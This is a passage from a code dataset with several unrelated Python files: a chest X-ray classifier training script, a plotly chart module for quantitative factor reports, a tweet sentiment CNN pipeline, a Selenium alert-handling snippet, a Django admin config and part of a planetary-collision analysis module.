\"cks\": ck_log,\n \"info\": info_log,\n \"train_csv\": train_csv,\n \"openi_csv\": openi_csv,\n \"pd_csv\": pd_csv,\n \"best_ck\": best_ck_log,\n \"grad\": grad_log,\n }\n\n\ndef main():\n BEST_AUC = -np.inf\n global args\n args = load_args()\n log_pack = log_init(args)\n config_wandb(args)\n\n model1, model1_ema = create_model_ema(densenet121, args.num_classes, args.device)\n optim1, optim1_ema = create_optimizer_ema(model1, model1_ema, args)\n\n wandb.watch(model1, log=\"all\")\n\n loader_construct = (\n construct_cx14_loader if args.train_data == \"NIH\" else construct_cxp_loader\n )\n train_loader, train_label_distribution = loader_construct(\n args, args.train_root_dir, \"train\"\n )\n test_loader, 
test_label_distribution = loader_construct(\n args, args.train_root_dir, \"test\"\n )\n # if args.eval_grad:\n # influence_loader, _ = loader_construct(args, args.train_root_dir, \"influence\")\n\n if args.train_data == \"NIH\":\n clean_test_loader, _ = loader_construct(args, args.train_root_dir, \"clean_test\")\n\n scaler = torch.cuda.amp.GradScaler(enabled=True)\n # criterion = nn.MultiLabelSoftMarginLoss().to(args.device)\n criterion1 = NVUMREG(\n len(train_loader.dataset),\n num_classes=args.num_classes,\n device=args.device,\n beta=args.reg_update_beta,\n prior=train_label_distribution,\n )\n logger.bind(stage=\"TRAIN\").info(\"Start Training\")\n lr = args.lr\n # test_openi(args, model=model1_ema, model2=model2_ema if args.use_ensemble else None)\n for epoch in range(args.total_epochs):\n if epoch == (0.7 * args.total_epochs) or epoch == (0.9 * args.total_epochs):\n lr *= 0.1\n for param in optim1.param_groups:\n param[\"lr\"] = lr\n train_loss1 = train(\n scaler,\n args,\n epoch,\n criterion1,\n model1,\n model1_ema,\n optim1,\n optim1_ema,\n train_loader,\n args.device,\n )\n train_loss = train_loss1\n all_auc, test_loss = test(\n model1_ema,\n test_loader,\n args.num_classes,\n args.device,\n )\n\n mean_auc = np.asarray(all_auc).mean()\n\n log_csv(epoch, all_auc, mean_auc, log_pack[\"train_csv\"])\n\n wandb.log(\n {\n f\"Test Loss {args.train_data}\": test_loss,\n f\"MeanAUC_14c {args.train_data}\": mean_auc,\n \"epoch\": epoch,\n }\n )\n\n logger.bind(stage=\"EVAL\").success(\n f\"Epoch {epoch:04d} Train Loss {train_loss:0.4f} Test Loss {test_loss:0.4f} Mean AUC {mean_auc:0.4f}\"\n )\n\n if args.train_data == \"NIH\":\n all_auc, test_loss = test(\n model1_ema,\n clean_test_loader,\n args.num_classes,\n args.device,\n clean_test=True,\n )\n wandb.log(\n {\n f\"Clean Test Loss {args.train_data}\": test_loss,\n \"Pneu\": all_auc[0],\n \"Nodule\": all_auc[2],\n \"Mass\": all_auc[1],\n \"epoch\": epoch,\n }\n )\n\n logger.bind(stage=\"EVAL\").success(\n f\"Epoch {epoch:04d} Train Loss {train_loss:0.4f} Test Loss {test_loss:0.4f} Pneu AUC {all_auc[0]:0.4f} Nodule AUC {all_auc[2]:0.4f} Mass AUC {all_auc[1]:0.4f}\"\n )\n\n # OPI\n openi_all_auc, openi_mean_auc = test_openi(args, model1_ema, model2=None)\n log_csv(epoch, openi_all_auc, openi_mean_auc, log_pack[\"openi_csv\"])\n\n # PDC\n pd_all_auc, pd_mean_auc = test_pc(args, model1_ema, model2=None)\n log_csv(epoch, pd_all_auc, pd_mean_auc, log_pack[\"pd_csv\"])\n\n if mean_auc > BEST_AUC:\n BEST_AUC = mean_auc\n state_dict = {\n \"net1\": model1.state_dict(),\n \"optimizer1\": optim1.state_dict(),\n \"net1_ema\": model1_ema.state_dict(),\n \"elt1\": criterion1.pred_hist,\n \"epoch\": epoch,\n \"mean_auc\": mean_auc,\n \"all_auc\": np.asarray(all_auc),\n }\n save_checkpoint(state_dict, epoch, log_pack[\"best_ck\"], is_best=True)\n save_checkpoint(state_dict, epoch, log_pack[\"cks\"])\n\n\ndef train(\n scaler,\n args,\n epoch,\n criterion,\n net,\n net_ema,\n optimizer,\n optimizer_ema,\n train_loader,\n device,\n):\n net.train()\n net_ema.train()\n total_loss = 0.0\n with tqdm(train_loader, desc=\"Train\", ncols=100) as tl:\n for batch_idx, (inputs, labels, item) in enumerate(tl):\n inputs, labels = inputs.to(device), labels.to(device)\n optimizer.zero_grad()\n\n lam = np.random.beta(1.0, 1.0)\n lam = max(lam, 1 - lam)\n mix_index = torch.randperm(inputs.shape[0]).to(device)\n\n with torch.cuda.amp.autocast(enabled=True):\n outputs = net(inputs)\n outputs_ema = net_ema(inputs).detach()\n\n criterion.update_hist(\n epoch,\n 
outputs_ema,\n labels.float(),\n item.numpy().tolist(),\n mix_index=mix_index,\n mixup_l=lam,\n )\n\n bce_loss, reg = criterion(outputs, labels)\n final_loss = torch.mean(bce_loss + args.reg_weight * reg)\n total_loss += final_loss.item()\n tl.set_description_str(\n desc=BRED\n + f\"BCE {bce_loss.mean().item():0.4f} Reg {reg.mean().item():.4f} Final {final_loss.item():.4f}\"\n + color.END\n )\n scaler.scale(final_loss).backward()\n scaler.step(optimizer)\n scaler.update()\n\n optimizer_ema.step()\n lr_value = optimizer.param_groups[0][\"lr\"]\n wandb.log(\n {\n \"MultiLabelSoftMarginLoss\": bce_loss.mean().item(),\n \"Reg\": reg.mean().item(),\n }\n )\n # break\n\n return total_loss / (batch_idx + 1)\n\n\ndef test(net, test_loader, num_classes, device, net2=None, clean_test=False):\n logger.bind(stage=\"EVAL\").info(\"************** EVAL ON NIH **************\")\n net.eval()\n all_preds = torch.FloatTensor([]).to(device)\n all_gts = torch.FloatTensor([]).to(device)\n total_loss = 0.0\n for batch_idx, (inputs, labels, item) in enumerate(\n tqdm(test_loader, desc=\"Test \", ncols=100)\n ):\n with torch.no_grad():\n inputs, labels = inputs.to(device), labels.to(device)\n\n outputs1 = net(inputs)\n outputs = outputs1\n\n loss = nn.BCEWithLogitsLoss()(outputs, labels)\n total_loss += loss.item()\n preds = torch.sigmoid(outputs)\n\n all_preds = torch.cat((all_preds, preds), dim=0)\n all_gts = torch.cat((all_gts, labels), dim=0)\n\n all_preds = all_preds.cpu().numpy()\n all_gts = all_gts.cpu().numpy()\n if clean_test:\n all_auc = list()\n all_auc.append(roc_auc_score(all_gts[:, 7], all_preds[:, 7]))\n all_auc.append(roc_auc_score(all_gts[:, 4], all_preds[:, 4]))\n all_auc.append(roc_auc_score(all_gts[:, 5], all_preds[:, 5]))\n else:\n all_auc = [\n roc_auc_score(all_gts[:, i], all_preds[:, i])\n for i in range(num_classes - 1)\n ]\n\n return all_auc, total_loss / (batch_idx + 1)\n\n\ndef create_model_ema(arch, num_classes, device):\n model = arch(pretrained=True)\n model.classifier = nn.Linear(1024, num_classes)\n\n model_ema = arch(pretrained=True)\n # model_ema.classifier = nn.Linear(1024, num_classes)\n model_ema.classifier = nn.Linear(1024, num_classes)\n for param in model_ema.parameters():\n param.detach_()\n\n return model.to(device), model_ema.to(device)\n\n\ndef create_optimizer_ema(model, model_ema, args):\n optim = torch.optim.Adam(\n list(filter(lambda p: p.requires_grad, model.parameters())),\n lr=args.lr,\n betas=(0.9, 0.99),\n eps=0.1,\n )\n optim_ema = WeightEMA(model, model_ema)\n for param in model_ema.parameters():\n param.detach_()\n\n return optim, optim_ema\n\n\nclass WeightEMA(object):\n def __init__(self, model, ema_model, alpha=0.99):\n self.model = model\n self.ema_model = ema_model\n self.alpha = alpha\n # self.params = model.module.state_dict()\n # self.ema_params = ema_model.module.state_dict()\n self.params = model.state_dict()\n self.ema_params = ema_model.state_dict()\n # self.wd = 0.02 * args.lr\n\n for (k, param), (ema_k, ema_param) in zip(\n self.params.items(), self.ema_params.items()\n ):\n ema_param.data.copy_(param.data)\n\n def step(self):\n one_minus_alpha = 1.0 - self.alpha\n for (k, param), (ema_k, ema_param) in zip(\n self.params.items(), self.ema_params.items()\n ):\n if param.type() == \"torch.cuda.LongTensor\":\n ema_param = param\n else:\n # if \"num_batches_tracked\" in k:\n # ema_param.copy_(param)\n # else:\n ema_param.mul_(self.alpha)\n ema_param.add_(param * one_minus_alpha)\n\n\nif __name__ == \"__main__\":\n\n fmt = \"{time:YYYY-MM-DD 
HH:mm:ss.SSS} | [{extra[stage]}] | {level: <8} | {message}\"\n logger.remove()\n logger.add(sys.stderr, format=fmt)\n main()\n","repo_name":"FBLADL/NVUM","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12223,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"5281275472","text":"import plotly.express as px \nfrom plotly.figure_factory import create_table\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nimport webbrowser\n\n\n\n\n\n\ndef summary_plot(report,excess=True,mode='notebook'):\n \"\"\"\n \"\"\"\n\n excess_str = 'excess' if excess else ''\n factor = report['factor']\n fig_list = []\n # ic_decay\n fig_ic_decay = px.bar(report['ic_decay'].mean(),title=f\"{factor} ic decay
    universe:{report['universe']}\")\n ic_decay_min = report['ic_decay'].mean().min()\n ic_decay_max = report['ic_decay'].mean().max()\n fig_ic_decay.update_layout(yaxis_range=[max(-0.2,ic_decay_min),min(0.2,ic_decay_max)])\n fig_list.append(fig_ic_decay)\n\n\n # ic-series\n ic_series = report['ic_series']\n ic_series_ma = ic_series.rolling(12).mean()\n fig_ic_series = make_subplots()\n index = ic_series_ma.index\n fig_ic_series.add_trace(\n go.Scatter(x=index ,y=ic_series_ma.values.tolist(),name='ic_ma12')\n )\n fig_ic_series.add_trace(\n go.Bar(x=index, y=ic_series.values.tolist(), name=\"ic\")\n )\n fig_ic_series.update_layout(title=f\"{factor} ic series
universe:{report['universe']}\")\n    fig_list.append(fig_ic_series)\n\n\n    # group net value (cumulative return per quantile)\n    for _group in report['groups'].keys():\n        sub_report = report['groups'][_group]\n        group_nvs = sub_report['group_nvs']\n        fig_group_nvs = px.line(group_nvs-1)\n        fig_group_nvs.update_layout(title=f\"{factor} cumulative {excess_str} return (compound) of different groups
groups:{_group} | universe:{report['universe']}\")\n        # fig_group_nvs.show()\n        fig_list.append(fig_group_nvs)\n\n    \n    for _group in report['groups'].keys():\n        # long-side return\n        sub_report = report['groups'][_group]\n        group_return_long = sub_report['group_return_long']\n        group_return_long_ma = group_return_long.rolling(12).mean()\n        fig_group_return_long = make_subplots()\n        index = group_return_long_ma.index\n        fig_group_return_long.add_trace(\n            go.Scatter(x=index ,y=group_return_long_ma.values.tolist(),name='return_ma12')\n        )\n        fig_group_return_long.add_trace(\n            go.Bar(x=index, y=group_return_long.values.tolist(), name=\"return\")\n        )\n        fig_group_return_long.update_layout(title=f\"{factor} long side {excess_str} return
groups:{_group} | universe:{report['universe']}\")\n        # fig_group_return_long.show()\n        fig_list.append(fig_group_return_long)\n\n    # for _group in report['groups'].keys():\n        # short-side return\n        sub_report = report['groups'][_group]\n        group_return_short = sub_report['group_return_short']\n        group_return_short_ma = group_return_short.rolling(12).mean()\n        fig_group_return_short = make_subplots()\n        index = group_return_short_ma.index\n        fig_group_return_short.add_trace(\n            go.Scatter(x=index ,y=group_return_short_ma.values.tolist(),name='return_ma12')\n        )\n        fig_group_return_short.add_trace(\n            go.Bar(x=index, y=group_return_short.values.tolist(), name=\"return\")\n        )\n        fig_group_return_short.update_layout(title=f\"{factor} short side {excess_str} return
groups:{_group} | universe:{report['universe']}\")\n        # fig_group_return_short.show()\n        fig_list.append(fig_group_return_short)\n\n    for _group in report['groups'].keys():\n        sub_report = report['groups'][_group] \n        fig_ret_SR_TO = make_subplots(rows=1,cols=3)\n        # annualized return per group\n        ann_ret = sub_report['ann_ret']\n        index = ann_ret.index\n        fig_ret_SR_TO.add_trace(\n            go.Bar(x=index,y=ann_ret.values,name=f'annual {excess_str} return'),row=1,col=1\n        )\n        # fig_ann_ret.show()\n\n        # Sharpe ratio per group\n        SR = sub_report['SR']\n        index = SR.index\n        fig_ret_SR_TO.add_trace(\n            go.Bar(x=index,y=SR.values,name='SR'),row=1,col=2\n        )\n\n        # turnover per group\n        TO = sub_report['TO']\n        index = TO.index\n        fig_ret_SR_TO.add_trace(\n            go.Bar(x=index,y=TO.values,name='TO'),row=1,col=3\n        )\n        fig_ret_SR_TO.update_layout(title=f\"{factor} annual {excess_str} return, SR and TO
groups:{_group} | universe:{report['universe']}\")\n        fig_list.append(fig_ret_SR_TO)\n\n    for _group in report['groups'].keys():\n        # per-group performance metrics\n        sub_report = report['groups'][_group]\n        perfs = sub_report['excess_performance']\n        perfs = perfs.rename(index={'turnover_ratio':'TO'})\n        table_perfs = create_table(perfs.reset_index())
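\n\n        # Aside (illustrative, dummy data; not part of this module): every\n        # bars-plus-rolling-mean figure above follows the same\n        # make_subplots/add_trace pattern, e.g.:\n        import pandas as pd  # only this demo needs pandas here\n        _demo_s = pd.Series([0.02, -0.01, 0.03, 0.00, 0.04])\n        _demo_ma = _demo_s.rolling(2).mean()\n        _demo_fig = make_subplots()\n        _demo_fig.add_trace(go.Bar(x=list(_demo_s.index), y=_demo_s.values.tolist(), name='raw'))\n        _demo_fig.add_trace(go.Scatter(x=list(_demo_ma.index), y=_demo_ma.values.tolist(), name='ma2'))\n\n        table_perfs.update_layout(title=f\"{excess_str} performance indicator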
    groups:{_group} | universe:{report['universe']}\")\n fig_list.append(table_perfs)\n # for _fig in fig_list:\n\n\n # bar_factor_ana = px.bar(report['factor_ana'],x='set',y='ic.mean',color='group',barmode='group',title='ic of different ep & liquidity')\n # bar_factor_ana.update_layout(title=f\"{factor} ic of different sort
universe:{report['universe']}\")\n    # fig_list.append(bar_factor_ana)\n\n    for _i in range(len(fig_list)):\n        _fig = fig_list[_i]\n        if mode !='notebook':\n            mode = 'a' if _i > 0 else 'w'\n            file = factor.replace(' ',\"_\")+'.html'\n            with open(file, mode) as f: \n                f.write(_fig.to_html(full_html=False, include_plotlyjs='cdn'))\n        else:\n            _fig.show()\n    if mode !='notebook':\n        webbrowser.open( file,new=2)\n\n\n\n","repo_name":"robortcher/easyquant","sub_path":"easyquant/easyalpha/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}\n{"seq_id":"69851427985","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\n\n'''\nBy padding the inputs we fix the maximum number of words per sentence; any\ninput shorter than the designated length is zero-padded to match.\n'''\ncsv = 'data/clean_tweet.csv'\nmy_df = pd.read_csv(csv, index_col=0)\nmy_df.dropna(inplace=True)\nmy_df.reset_index(drop=True,inplace=True)\nmy_df = pd.concat([my_df[my_df.target == 0][:int(len(my_df)*0.05)],my_df[my_df.target == 4][:int(len(my_df)*0.05)]])\n# recode the 4-coded positives as 1 so the binary masks and the\n# sigmoid/binary-crossentropy training below behave correctly\nmy_df['target'] = my_df['target'].replace(4, 1)\nmy_df.info()\n\nx = my_df.text\ny = my_df.target\n\nfrom sklearn.model_selection import train_test_split\nSEED = 2000\nx_train, x_validation_and_test, y_train, y_validation_and_test = train_test_split(x, y, test_size=.02, random_state=SEED)\nx_validation, x_test, y_validation, y_test = train_test_split(x_validation_and_test, y_validation_and_test, test_size=.5, random_state=SEED)\n\nprint(\"Train set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive\".format(len(x_train),\n                                                                             (len(x_train[y_train == 0]) / (len(x_train)*1.))*100,\n                                                                            (len(x_train[y_train == 1]) / (len(x_train)*1.))*100))\nprint(\"Validation set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive\".format(len(x_validation),\n                                                                             (len(x_validation[y_validation == 0]) / (len(x_validation)*1.))*100,\n                                                                            (len(x_validation[y_validation == 1]) / (len(x_validation)*1.))*100))\nprint(\"Test set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive\".format(len(x_test),\n                                                                             (len(x_test[y_test == 0]) / (len(x_test)*1.))*100,\n                                                                            (len(x_test[y_test == 1]) / (len(x_test)*1.))*100))\n\nfrom tqdm import tqdm\ntqdm.pandas(desc = 'progress-bar')\nimport gensim\nfrom gensim.models.word2vec import Word2Vec\nfrom gensim.models.doc2vec import TaggedDocument\nimport multiprocessing\nfrom sklearn import utils\n\ndef labelize_tweets_ug(tweets, label):\n    result = []\n    prefix = label\n    for i,t in zip(tweets.index, tweets):\n        result.append(TaggedDocument(t.split(),[prefix + '_%s' % i]))\n    return result\n\nall_x = pd.concat([x_train, x_validation,x_test])\nall_x_w2v = labelize_tweets_ug(all_x,'all')\n\ncores = multiprocessing.cpu_count()\nmodel_ug_cbow = Word2Vec(sg = 0,size=100,negative=5,window=2,min_count=2,workers=cores, alpha=0.065,min_alpha=0.065)\nmodel_ug_cbow.build_vocab([x.words for x in tqdm(all_x_w2v)])\nfor epoch in range(30):\n    model_ug_cbow.train(utils.shuffle([x.words for x in tqdm(all_x_w2v)]),total_examples=len(all_x_w2v),epochs=1)\n    model_ug_cbow.alpha -= 0.002\n    model_ug_cbow.min_alpha = model_ug_cbow.alpha\n\nmodel_ug_sg = Word2Vec(sg =1, size =100, negative=5,min_count=2,window=2,workers=cores,alpha=0.065,min_alpha=0.065)\nmodel_ug_sg.build_vocab([x.words for x in tqdm(all_x_w2v)])\nfor epoch in range(30):\n    model_ug_sg.train(utils.shuffle([x.words for x in 
tqdm(all_x_w2v)]),total_examples=len(all_x_w2v),epochs=1)\n model_ug_sg.alpha -= 0.002\n model_ug_sg.min_alpha = model_ug_sg.alpha\n\nmodel_ug_cbow.save('word2vec_model/model_ug_cbow.word2vec')\nmodel_ug_sg.save('word2vec_model/model_ug_sg.word2vec')\n\n\n''' Preparation for CNN '''\n\nfrom gensim.models import KeyedVectors\nmodel_ug_cbow = KeyedVectors.load('word2vec_model/model_ug_cbow.word2vec')\nmodel_ug_sg = KeyedVectors.load('word2vec_model/model_ug_sg.word2vec')\n\nlen(model_ug_cbow.wv.vocab.keys())\n\n'''\nBy running below code block, I am constructing a sort of dictionary I can extract the word vectors from. \nSince I have two different Word2Vec models, below \"embedding_index\" will have concatenated vectors of the \ntwo models. For each model, I have 100 dimension vector representation of the words, and by concatenating \neach word will have 200 dimension vector representation.\n'''\nembeddings_index = {}\nfor w in model_ug_cbow.wv.vocab.keys():\n embeddings_index[w] = np.append(model_ug_cbow.wv[w],model_ug_sg.wv[w])\nprint('Found %s word vectors.' % len(embeddings_index))\n\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\n\ntokenizer = Tokenizer(num_words=100000)\ntokenizer.fit_on_texts(x_train)\nsequences = tokenizer.texts_to_sequences(x_train)\n\nlen(tokenizer.word_index)\n\n## below are the first five entries of the original train data\nfor x in x_train[:5]:\n print(x)\nsequences[:5]\n\n## figure the max sequence length\nlength = []\nfor x in x_train:\n length.append(len(x.split()))\n\nmax(length) ## max length of sequence is 34, let's make the seq length is little longer 45\nx_train_seq = pad_sequences(sequences,maxlen=45)\nprint('Shape of data tensor:', x_train_seq.shape)\nx_train_seq[:5]\n\nsequences_val = tokenizer.texts_to_sequences(x_validation)\nx_val_seq = pad_sequences(sequences_val, maxlen=45)\n\nnum_words = 100000\nembedding_matrix = np.zeros((num_words,200))\nfor word, i in tokenizer.word_index.items():\n if i >= num_words:\n continue\n embeddings_vector = embeddings_index.get(word)\n if embeddings_vector is not None:\n embedding_matrix[i] = embeddings_vector\n\n\n''' Build Normal ANN Model '''\nseed = 7\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout,Flatten\nfrom keras.layers.embeddings import Embedding\n\nmodel_ptw2v = Sequential()\ne = Embedding(100000,200,weights=[embedding_matrix],input_length=45,trainable=True)\nmodel_ptw2v.add(e)\nmodel_ptw2v.add(Flatten())\nmodel_ptw2v.add(Dense(256,activation='relu'))\nmodel_ptw2v.add(Dense(1,activation='sigmoid'))\nmodel_ptw2v.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\nmodel_ptw2v.fit(x_train_seq,y_train,validation_data=(x_val_seq,y_validation),epochs=5,batch_size=32,verbose=2)\n\n\n''' CNN '''\nfrom keras.layers import Conv1D,GlobalMaxPool1D\nstructure_test = Sequential()\ne = Embedding(100000,200,input_length=45)\nstructure_test.add(e)\nstructure_test.add(Conv1D(filters=100,kernel_size=2,padding='valid',activation='relu',strides=1))\nstructure_test.summary()\n\nmodel_cnn_01 = Sequential()\ne = Embedding(100000, 200, weights=[embedding_matrix], input_length=45, trainable=True)\nmodel_cnn_01.add(e)\nmodel_cnn_01.add(Conv1D(filters=100, kernel_size=2, padding='valid', activation='relu', strides=1))\nmodel_cnn_01.add(GlobalMaxPool1D())\nmodel_cnn_01.add(Dense(256, activation='relu'))\nmodel_cnn_01.add(Dense(1, activation='sigmoid'))\nmodel_cnn_01.compile(loss='binary_crossentropy', optimizer='adam', 
metrics=['accuracy'])\nmodel_cnn_01.fit(x_train_seq, y_train, validation_data=(x_val_seq, y_validation), epochs=5, batch_size=32, verbose=2)\n\n## combined bigram, trigram, fourgram\nfrom keras.layers import Input,Dense, concatenate,Activation\nfrom keras.models import Model\n\ntweet_input = Input(shape=(45,),dtype='int32')\n\ntweet_encoder = Embedding(100000,200,weights=[embedding_matrix],input_length=45,trainable=True)(tweet_input)\nbigram_branch = Conv1D(filters=100,kernel_size=2,padding='valid',activation='relu',strides=1)(tweet_encoder)\nbigram_branch = GlobalMaxPool1D()(bigram_branch)\n\ntrigram_branch = Conv1D(filters=100,kernel_size=3,padding='valid',activation='relu',strides=1)(tweet_encoder)\ntrigram_branch = GlobalMaxPool1D()(trigram_branch)\n\nfourgram_branch = Conv1D(filters=100,kernel_size=4,padding='valid',activation='relu',strides=1)(tweet_encoder)\nfourgram_branch = GlobalMaxPool1D()(fourgram_branch)\n\nmerged = concatenate([bigram_branch,trigram_branch,fourgram_branch],axis = 1)\n\nmerged = Dense(256,activation='relu')(merged)\nmerged = Dropout(0.2)(merged)\nmerged = Dense(1)(merged)\noutput = Activation('sigmoid')(merged)\nmodel = Model(inputs=[tweet_input],outputs=[output])\nmodel.compile(loss='binary_crossentropy',\n              optimizer='adam',\n              metrics=['accuracy'])\nmodel.summary()\n\nfrom keras.callbacks import ModelCheckpoint\nfilepath = 'cnn_model/CNN_best_weights.{epoch:02d}-{val_acc:.4f}.hdf5'\ncheckpoint = ModelCheckpoint(filepath,monitor='val_acc',verbose=1,save_best_only=True, mode='max')\nmodel.fit(x_train_seq,y_train, batch_size=32,epochs=5,validation_data=(x_val_seq,y_validation),callbacks=[checkpoint])\n\n\n## load model\nimport glob\nfrom keras.models import load_model\n# ModelCheckpoint substitutes epoch/val_acc into the filename, so load the\n# newest checkpoint it actually wrote rather than the literal pattern string\nloaded_CNN_model = load_model(sorted(glob.glob('cnn_model/CNN_best_weights.*.hdf5'))[-1])\nloaded_CNN_model.evaluate(x=x_val_seq,y=y_validation)\n\n## finally, model evaluation with test set\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\ntvec = TfidfVectorizer(max_features=100000,ngram_range=(1,3))\ntvec.fit(x_train)\n\nx_train_tfidf = tvec.transform(x_train)\nx_test_tfidf = tvec.transform(x_test)\n\nlr_with_tfidf = LogisticRegression()\nlr_with_tfidf.fit(x_train_tfidf,y_train)\n\nlr_with_tfidf.score(x_test_tfidf,y_test)\nyhat_lr = lr_with_tfidf.predict_proba(x_test_tfidf)\n\n\n\nsequences_test = tokenizer.texts_to_sequences(x_test)\nx_test_seq = pad_sequences(sequences_test,maxlen=45)\nloaded_CNN_model.evaluate(x=x_test_seq, y=y_test)\nyhat_cnn = loaded_CNN_model.predict(x_test_seq)\n\n\n## plot the graph\nfrom sklearn.metrics import roc_curve, auc\nfpr, tpr, threshold = roc_curve(y_test, yhat_lr[:,1])\nroc_auc = auc(fpr, tpr)\nfpr_cnn, tpr_cnn, threshold = roc_curve(y_test, yhat_cnn)\nroc_auc_nn = auc(fpr_cnn, tpr_cnn)\nplt.figure(figsize=(8,7))\nplt.plot(fpr, tpr, label='tfidf-logit (area = %0.3f)' % roc_auc, linewidth=2)\nplt.plot(fpr_cnn, tpr_cnn, label='w2v-CNN (area = %0.3f)' % roc_auc_nn, linewidth=2)\n\nplt.plot([0, 1], [0, 1], 'k--', linewidth=2)\nplt.xlim([-0.05, 1.0])\nplt.ylim([-0.05, 1.05])\nplt.xlabel('False Positive Rate', fontsize=18)\nplt.ylabel('True Positive Rate', fontsize=18)\nplt.title('Receiver operating characteristic: is positive', fontsize=18)\nplt.legend(loc=\"lower 
right\")\nplt.show()\n\n\n\n","repo_name":"Elvirasun28/sentiment_analysis_twitter","sub_path":"sentiment11.py","file_name":"sentiment11.py","file_ext":"py","file_size_in_byte":10035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28377292751","text":"import time\n\nfrom seleniumBasics.browser_invoking import invoke_browser\n\nurl = \"https://mail.rediff.com/cgi-bin/login.cgi\"\ndriver = invoke_browser()\ndriver.get(url)\ndriver.maximize_window()\ndriver.find_element_by_name(\"proceed\").click()\ntime.sleep(1)\nalert = driver.switch_to.alert\n\nprint(alert.text)\nalert.accept()\ntime.sleep(1)\ndriver.close()\n\n\n\n","repo_name":"mksingh8/seleniumSession2021","sub_path":"seleniumBasics/alert_handle_alert.py","file_name":"alert_handle_alert.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26614107962","text":"from django.contrib import admin\nfrom .models import Product, ProductImages\n\nclass ProductAdmin(admin.ModelAdmin):\n list_display = ('id', 'title', 'address','price', 'is_published', 'price', 'list_date','vendor')\n list_display_links = ('id', 'title')\n list_filter = ('vendor',)\n list_editable = ('is_published',)\n search_fields = ('title', 'address', 'city', 'price')\n list_per_page = 25\n# Register your models here.\n\nadmin.site.register(Product, ProductAdmin)\nadmin.site.register(ProductImages)\n","repo_name":"abubakar998/technical_test","sub_path":"backend/products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26727082581","text":"import numpy as np\nfrom astropy.table import vstack,Table,Column,setdiff,join\nfrom tqdm import tqdm\nfrom tqdm import tqdm_notebook as tqdm\nimport astropy.units as u\nimport astropy.constants as c\nimport astropy.io \nimport sys\nimport colltree.util as util\n\n#set constants\nau = 1.495978707e8 #in km\nmunit = 5.0428958e31 #in grams\nmearth = 5.972e24*1e3 #in g\nmsol = 1.989e30*1e3 #in g\n\ndef get_vel(base_dir,fdir,folname_min,folname_max):\n '''Get a table of giant collisions that combines info from follow.maxcorecollisions and important_velcoities.out\n \n Input:\n base_dir = directory where runs are\n fdir = run directory\n folname_min = follow. file name\n folname_max = follow. 
file name\n \n Output:\n colls'''\n\n #read in data\n coll = util.read_follow(base_dir,fdir,folname_min,folname_max)\n \n #read in velocity data\n vel = Table.read(base_dir+fdir+'/important_velocities.out',format='ascii.no_header',\n names=('id1','id2','ctype','gamma','b','bcrit','time','vesc','vimp','vescalpha','veros',\n 'vcat','vsup','vhr','reveros','revsup'))\n\n #match up velocity info with collision info\n vround = np.vectorize(util.fround)\n vel['time'] = vround(vel['time'])\n tab = join(coll,vel,keys=['time'],join_type='left')\n\n #read in mass to get giant collisions from\n mtiny = np.genfromtxt(base_dir+fdir+'/continue.in')\n mask8 = tab['pmass'] >= mtiny[2]\n\n colls = tab[mask8]\n\n return(colls)\n\n\ndef get_allvel(base_dir,dir_tab,fname,ovw,folname_min,folname_max):\n '''Get a table of giant collision info, including impact parameters, for a list of directories\n \n Input:\n base_dir = directory where runs are\n dir_tab = table with runs to use\n fname = name of output file of giant collision info\n ovw = True if you want to overwrite any pre-existing files with that name\n folname_min = name of follow. file\n folname_max = name of follow. file\n \n Output:\n tot_colls = table with all collision data'''\n\n #define table\n tot_colls = Table(names=('dir','dloss','ecc','inc','slope','time','a','iac','iap','tmass','CMFt','CMFt_min','il','ilp','pmass','CMFp','CMFp_min','itype','iLR','LRMass','CMFLR','CMFLR_min','iSLR','SLRMass','CMFSLR','CMFSLR_min','inew','ideb','mdeb','id1','id2','ctype','gamma','b','bcrit','vesc','vimp','vescalpha','veros','vcat','vsup','vhr','reveros','revsup'),\n dtype=('U100','U12','float64','float64','U12','float64','float64','int32','int32','float64','float64','float64','int32','int32','float64','float64','float64','int32','int32','float64','float64','float64','int32','float64','float64','float64',\n 'int32','int32','float64','int32','int32','int32','float64','float64','float64','float64','float64','float64','float64','float64','float64','float64','float64','float64'))\n\n for i in range (0,len(dir_tab['dir'])):\n colls = get_vel(base_dir,dir_tab['dir'][i],folname_min,folname_max)\n\n #add columns with init params\n dir_c = Column([dir_tab['dir'][i]]*len(colls))\n dloss = Column([dir_tab['dloss'][i]]*len(colls))\n ecc = Column([dir_tab['av_ecc'][i]]*len(colls))\n inc = Column([dir_tab['av_inc'][i]]*len(colls))\n slope =Column([dir_tab['slope'][i]]*len(colls))\n colls.add_column(dir_c,name='dir',index=0)\n colls.add_column(dloss,name='dloss',index=1)\n colls.add_column(ecc,name='ecc',index=2)\n colls.add_column(inc,name='inc',index=3)\n colls.add_column(slope,name='slope',index=4)\n\n tot_colls = vstack([tot_colls,colls])\n\n #write table to a csv file in base_dir\n if ovw:\n tot_colls.write(base_dir+fname,format='ascii.csv',overwrite=True)\n\n return(tot_colls)\n\n\ndef iterate_clist(pcoll,clist,master_ids,new_ids,iname,p):\n \"\"\"Iterate through collisions list and add to collision history if not duplicate\n Input:\n pcoll = collision history table for this planet\n clist = list of collisions to search through\n master_ids = embryos that make up this planet\n new_ids = new planet ids in this list \n iname = name of ids to add to new_ids\n p = planet id\n\n Output:\n pcoll = updated version\n new_ids = updated 